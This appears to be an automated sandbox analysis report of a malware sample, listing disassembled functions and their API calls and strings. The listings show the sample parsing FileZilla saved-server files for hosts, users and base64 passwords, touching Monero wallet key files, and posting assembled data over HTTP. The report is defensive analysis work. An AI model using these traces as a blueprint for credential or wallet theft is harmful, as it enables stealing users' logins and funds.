GetProcAddress.KERNEL32(75A50000,013865A0), ref: 000BA3CB
GetProcAddress.KERNEL32(75A50000,01386400), ref: 000BA3E4
GetProcAddress.KERNEL32(75A50000,0139D9C8), ref: 000BA3FC
GetProcAddress.KERNEL32(75A50000,0139D8A8), ref: 000BA414
GetProcAddress.KERNEL32(75070000,01386480), ref: 000BA436
GetProcAddress.KERNEL32(75070000,0139D8F0), ref: 000BA44E
GetProcAddress.KERNEL32(75070000,0139D968), ref: 000BA466
GetProcAddress.KERNEL32(75070000,0139D980), ref: 000BA47F
GetProcAddress.KERNEL32(75070000,0139D9E0), ref: 000BA497
GetProcAddress.KERNEL32(74E50000,01386580), ref: 000BA4B8
GetProcAddress.KERNEL32(74E50000,013863A0), ref: 000BA4D1
GetProcAddress.KERNEL32(75320000,013862C0), ref: 000BA4F2
GetProcAddress.KERNEL32(75320000,0139DC08), ref: 000BA50A
GetProcAddress.KERNEL32(6F060000,01386280), ref: 000BA530
GetProcAddress.KERNEL32(6F060000,013864E0), ref: 000BA548
GetProcAddress.KERNEL32(6F060000,01386520), ref: 000BA560
GetProcAddress.KERNEL32(6F060000,0139DBF0), ref: 000BA579
GetProcAddress.KERNEL32(6F060000,01386540), ref: 000BA591
GetProcAddress.KERNEL32(6F060000,01386560), ref: 000BA5A9
GetProcAddress.KERNEL32(6F060000,013865C0), ref: 000BA5C2
GetProcAddress.KERNEL32(6F060000,01386620), ref: 000BA5DA
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 000BA5F1
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 000BA607
GetProcAddress.KERNEL32(74E00000,0139DB30), ref: 000BA629
GetProcAddress.KERNEL32(74E00000,01398960), ref: 000BA641
GetProcAddress.KERNEL32(74E00000,0139DC80), ref: 000BA659
GetProcAddress.KERNEL32(74E00000,0139DD40), ref: 000BA672
GetProcAddress.KERNEL32(74DF0000,01386320), ref: 000BA693
GetProcAddress.KERNEL32(6FA90000,0139DD58), ref: 000BA6B4
GetProcAddress.KERNEL32(6FA90000,01386340), ref: 000BA6CD
GetProcAddress.KERNEL32(6FA90000,0139DDA0), ref: 000BA6E5
GetProcAddress.KERNEL32(6FA90000,0139DE00), ref: 000BA6FD

Strings

InternetSetOptionA, xrefs: 000BA5E5
HttpQueryInfoA, xrefs: 000BA5FC

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: bf0c13567311b667bea18a6b0b0f9d32a97251bfcac97db9265ea5c7957c7c7c
Instruction ID: 865becd03d530aca223b9a7f87f87565f8776e4e1319d0173f5d350455b5b218
Opcode Fuzzy Hash: bf0c13567311b667bea18a6b0b0f9d32a97251bfcac97db9265ea5c7957c7c7c
Instruction Fuzzy Hash: 01624BB55812C0AFC754DFA8FDDC95ABBF9F78C301705851AA609CF264D639B881CB22

Function 000A7710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000A7724
RtlAllocateHeap.NTDLL(00000000), ref: 000A772B
lstrcat.KERNEL32(?,0139F070), ref: 000A78DB
lstrcat.KERNEL32(?,?), ref: 000A78EF
lstrcat.KERNEL32(?,?), ref: 000A7903
lstrcat.KERNEL32(?,?), ref: 000A7917
lstrcat.KERNEL32(?,0139EC40), ref: 000A792B
lstrcat.KERNEL32(?,0139EC70), ref: 000A793F
lstrcat.KERNEL32(?,0139EC58), ref: 000A7952
lstrcat.KERNEL32(?,0139EBB0), ref: 000A7966
lstrcat.KERNEL32(?,0139F0F8), ref: 000A797A
lstrcat.KERNEL32(?,?), ref: 000A798E
lstrcat.KERNEL32(?,?), ref: 000A79A2
lstrcat.KERNEL32(?,?), ref: 000A79B6
lstrcat.KERNEL32(?,0139EC40), ref: 000A79C9
lstrcat.KERNEL32(?,0139EC70), ref: 000A79DD
lstrcat.KERNEL32(?,0139EC58), ref: 000A79F1
lstrcat.KERNEL32(?,0139EBB0), ref: 000A7A04
lstrcat.KERNEL32(?,0139F160), ref: 000A7A18
lstrcat.KERNEL32(?,?), ref: 000A7A2C
lstrcat.KERNEL32(?,?), ref: 000A7A40
lstrcat.KERNEL32(?,?), ref: 000A7A54
lstrcat.KERNEL32(?,0139EC40), ref: 000A7A68
lstrcat.KERNEL32(?,0139EC70), ref: 000A7A7B
lstrcat.KERNEL32(?,0139EC58), ref: 000A7A8F
lstrcat.KERNEL32(?,0139EBB0), ref: 000A7AA3
lstrcat.KERNEL32(?,0139F1C8), ref: 000A7AB6
lstrcat.KERNEL32(?,?), ref: 000A7ACA
lstrcat.KERNEL32(?,?), ref: 000A7ADE
lstrcat.KERNEL32(?,?), ref: 000A7AF2
lstrcat.KERNEL32(?,0139EC40), ref: 000A7B06
lstrcat.KERNEL32(?,0139EC70), ref: 000A7B1A
lstrcat.KERNEL32(?,0139EC58), ref: 000A7B2D
lstrcat.KERNEL32(?,0139EBB0), ref: 000A7B41
lstrcat.KERNEL32(?,0139F230), ref: 000A7B55
lstrcat.KERNEL32(?,?), ref: 000A7B69
lstrcat.KERNEL32(?,?), ref: 000A7B7D
lstrcat.KERNEL32(?,?), ref: 000A7B91
lstrcat.KERNEL32(?,0139EC40), ref: 000A7BA4
lstrcat.KERNEL32(?,0139EC70), ref: 000A7BB8
lstrcat.KERNEL32(?,0139EC58), ref: 000A7BCC
lstrcat.KERNEL32(?,0139EBB0), ref: 000A7BDF
lstrcat.KERNEL32(?,0139F298), ref: 000A7BF3
lstrcat.KERNEL32(?,?), ref: 000A7C07
lstrcat.KERNEL32(?,?), ref: 000A7C1B
lstrcat.KERNEL32(?,?), ref: 000A7C2F
lstrcat.KERNEL32(?,0139EC40), ref: 000A7C43
lstrcat.KERNEL32(?,0139EC70), ref: 000A7C56
lstrcat.KERNEL32(?,0139EC58), ref: 000A7C6A
lstrcat.KERNEL32(?,0139EBB0), ref: 000A7C7E

Part of subcall function 000A75D0: lstrcat.KERNEL32(35D45020,000C17FC), ref: 000A7606
Part of subcall function 000A75D0: lstrcat.KERNEL32(35D45020,00000000), ref: 000A7648
Part of subcall function 000A75D0: lstrcat.KERNEL32(35D45020, : ), ref: 000A765A
Part of subcall function 000A75D0: lstrcat.KERNEL32(35D45020,00000000), ref: 000A768F
Part of subcall function 000A75D0: lstrcat.KERNEL32(35D45020,000C1804), ref: 000A76A0
Part of subcall function 000A75D0: lstrcat.KERNEL32(35D45020,00000000), ref: 000A76D3
Part of subcall function 000A75D0: lstrcat.KERNEL32(35D45020,000C1808), ref: 000A76ED
Part of subcall function 000A75D0: task.LIBCPMTD ref: 000A76FB

lstrcat.KERNEL32(?,0139F600), ref: 000A7E0B
lstrcat.KERNEL32(?,0139E6B8), ref: 000A7E1E
lstrlen.KERNEL32(35D45020), ref: 000A7E2B
lstrlen.KERNEL32(35D45020), ref: 000A7E3B

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 166c1490850fd7b7b092a2620b1daff6063eb1b47758bcb5b1b770bb91d57dad
Instruction ID: 2ac5a74f71089eac441477db33d4462756f5885eb10b06d4459af85789bf66e1
Opcode Fuzzy Hash: 166c1490850fd7b7b092a2620b1daff6063eb1b47758bcb5b1b770bb91d57dad
Instruction Fuzzy Hash: 3B321CB2D40354ABDB15EBA0EC89DEA737CBB44700F444A88F20DA6091EE74E789CF51

Function 000B0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000B8E0B

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000A99EC
Part of subcall function 000A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000A9A11
Part of subcall function 000A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000A9A31
Part of subcall function 000A99C0: ReadFile.KERNEL32(000000FF,?,00000000,000A148F,00000000), ref: 000A9A5A
Part of subcall function 000A99C0: LocalFree.KERNEL32(000A148F), ref: 000A9A90
Part of subcall function 000A99C0: CloseHandle.KERNEL32(000000FF), ref: 000A9A9A

Part of subcall function 000B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000B8E52

GetProcessHeap.KERNEL32(00000000,000F423F,000C0DBA,000C0DB7,000C0DB6,000C0DB3), ref: 000B0362
RtlAllocateHeap.NTDLL(00000000), ref: 000B0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 000B0385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000C0DB2), ref: 000B0393
StrStrA.SHLWAPI(00000000,<Port>), ref: 000B03CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000C0DB2), ref: 000B03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 000B0419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000C0DB2), ref: 000B0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 000B0463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000C0DB2), ref: 000B0475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000C0DB2), ref: 000B0502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000C0DB2), ref: 000B051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000C0DB2), ref: 000B0532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000C0DB2), ref: 000B054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 000B0562
lstrcat.KERNEL32(?,profile: null), ref: 000B0571
lstrcat.KERNEL32(?,url: ), ref: 000B0580
lstrcat.KERNEL32(?,00000000), ref: 000B0593
lstrcat.KERNEL32(?,000C1678), ref: 000B05A2
lstrcat.KERNEL32(?,00000000), ref: 000B05B5
lstrcat.KERNEL32(?,000C167C), ref: 000B05C4
lstrcat.KERNEL32(?,login: ), ref: 000B05D3
lstrcat.KERNEL32(?,00000000), ref: 000B05E6
lstrcat.KERNEL32(?,000C1688), ref: 000B05F5
lstrcat.KERNEL32(?,password: ), ref: 000B0604
lstrcat.KERNEL32(?,00000000), ref: 000B0617
lstrcat.KERNEL32(?,000C1698), ref: 000B0626
lstrcat.KERNEL32(?,000C169C), ref: 000B0635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000C0DB2), ref: 000B068E

Strings

<User>, xrefs: 000B0410
profile: null, xrefs: 000B0568
password: , xrefs: 000B05FB
login: , xrefs: 000B05CA
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 000B02A4
<Port>, xrefs: 000B03C6
<Host>, xrefs: 000B037C
browser: FileZilla, xrefs: 000B0559
<Pass encoding="base64">, xrefs: 000B045A
url: , xrefs: 000B0577

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: f3b73aa5b051a262075e7efe9aa87a24a0dc5f4451095ddfffd7ff1765bbe7e3
Instruction ID: 4e2c3b85ad04ed224c85accbf57543113ee604083549ec2c4ba4c44213746d5f
Opcode Fuzzy Hash: f3b73aa5b051a262075e7efe9aa87a24a0dc5f4451095ddfffd7ff1765bbe7e3
Instruction Fuzzy Hash: 84D12471A40108ABDB04EBF4DD9AEEE7778FF55300F544518F102BA192DF74AA4ACB62

Function 000A5100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000A4839
Part of subcall function 000A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000A4849

lstrlen.KERNEL32(00000000), ref: 000A5193

Part of subcall function 000B8EA0: CryptBinaryToStringA.CRYPT32(00000000,000A5184,40000001,00000000,00000000,?,000A5184), ref: 000B8EC0

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000A5207
StrCmpCA.SHLWAPI(?,0139F5E0), ref: 000A5225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000A5340
HttpOpenRequestA.WININET(00000000,0139F6B0,?,0139ECE8,00000000,00000000,00400100,00000000), ref: 000A53A4

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0139F5A0,00000000,?,01399918,00000000,?,000C19DC,00000000,?,000B51CF), ref: 000A5737
lstrlen.KERNEL32(00000000), ref: 000A574B
GetProcessHeap.KERNEL32(00000000,?), ref: 000A575C
RtlAllocateHeap.NTDLL(00000000), ref: 000A5763
lstrlen.KERNEL32(00000000), ref: 000A5778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000A57A9
lstrlen.KERNEL32(00000000), ref: 000A57C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000A57E1
lstrlen.KERNEL32(00000000,?,?), ref: 000A580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000A5822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000A584D
InternetCloseHandle.WININET(00000000), ref: 000A58B1
InternetCloseHandle.WININET(00000000), ref: 000A58BE
InternetCloseHandle.WININET(00000000), ref: 000A58C8

Strings

--, xrefs: 000A5280
------, xrefs: 000A563B
------, xrefs: 000A53B7
------, xrefs: 000A54F9
", xrefs: 000A5706
", xrefs: 000A55C4
", xrefs: 000A5482
------, xrefs: 000A5297

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 9ed665b3845606b9b7fcb80326fd36300c8cbf5f0242370307e4ea258e28e87b
Instruction ID: 059791634bbe9e9ff26bc9ca2d1d003bc8fb4d2cc8e56054a2db8e0e710f6705
Opcode Fuzzy Hash: 9ed665b3845606b9b7fcb80326fd36300c8cbf5f0242370307e4ea258e28e87b
Instruction Fuzzy Hash: F532FE72A20118BADB14EBA0DCA5FEEB378BF55700F404199F10676493EF746A49CF62

Function 000AA790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000BAA70: StrCmpCA.SHLWAPI(013989D0,000AA7A7,?,000AA7A7,013989D0), ref: 000BAA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000AAAC8
RtlAllocateHeap.NTDLL(00000000), ref: 000AAACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 000AABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000AA8B0

Part of subcall function 000BA820: lstrlen.KERNEL32(000A4F05,?,?,000A4F05,000C0DDE), ref: 000BA82B
Part of subcall function 000BA820: lstrcpy.KERNEL32(000C0DDE,00000000), ref: 000BA885

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

lstrcat.KERNEL32(?,00000000), ref: 000AACEB
lstrcat.KERNEL32(?,000C1320), ref: 000AACFA
lstrcat.KERNEL32(?,00000000), ref: 000AAD0D
lstrcat.KERNEL32(?,000C1324), ref: 000AAD1C
lstrcat.KERNEL32(?,00000000), ref: 000AAD2F
lstrcat.KERNEL32(?,000C1328), ref: 000AAD3E
lstrcat.KERNEL32(?,00000000), ref: 000AAD51
lstrcat.KERNEL32(?,000C132C), ref: 000AAD60
lstrcat.KERNEL32(?,00000000), ref: 000AAD73
lstrcat.KERNEL32(?,000C1330), ref: 000AAD82
lstrcat.KERNEL32(?,00000000), ref: 000AAD95
lstrcat.KERNEL32(?,000C1334), ref: 000AADA4
lstrcat.KERNEL32(?,00000000), ref: 000AADB7
lstrlen.KERNEL32(?), ref: 000AAE0D
lstrlen.KERNEL32(?), ref: 000AAE1C

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

DeleteFileA.KERNEL32(00000000), ref: 000AAE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 000AABD4

Memory Dump Source

